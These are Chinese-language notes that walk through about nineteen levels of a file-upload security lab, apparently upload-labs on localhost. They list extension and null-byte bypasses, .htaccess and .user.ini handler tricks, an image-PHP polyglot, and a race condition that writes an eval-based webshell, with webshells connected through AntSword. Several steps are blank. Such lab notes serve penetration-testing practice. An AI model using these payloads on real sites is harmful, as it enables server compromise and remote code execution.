一。
1.将一个php文件重命名为jpg文件

2.将这个jpg文件上传然后抓包吧jpg改成php接着放行

3.鼠标右键图片在新建标签页打开图片后去蚁剑连接

二
1.上传jpg文件然后抓包把jpg改成php放行

2.图片右键新建标签页打开图片,复制图片地址去蚁剑连接

三
1.文件重命名为1.php5

2.
上传1.php5文件,图片右键新建标签页打开图片,复制图片地址去蚁剑连接

四。
1.创建一个.htaccess文件,里面输入内容
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php</FilesMatch>

2.先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片

五
1.创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"

2.先上传.user,ini文件,再上传1.jpg,访问http://127.0.0.1/upload/upload/readme.php

六。
1.上传1.php抓包,将1.php改为1.phP,放行

2.新标签页打开

七.
1.上传1.php抓包,将1.php后面加空格,放行

2.图片右键新建标签页打开图片

八
1.上传1.php抓包,将1.php后面加.,放行

2.

九.
1.上传1.php抓包,将1.php后面加::$DATA,放行

2.

十
1.上传1.php文件抓包,1.php后面加.空格. 放行

2.

十一
1.将1.php改为1.pphphp
2.
十二
1.
上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行

2.图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问

十三。
1,
上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg

2.打开Hex,将6.php后面的空格对应的20改为00,放行

3.删掉�/9320240830163621.jpg访问

十四
1.将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+2.php/a shell.jpg

2.上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

十五.
1.上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

十六
环境问题跳过
十七
1.图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

十八。
1.php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

2.上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

3.同时攻击,直到出现webshell.php

4.

十九
1.上传php文件,保存名称改为1.php/.



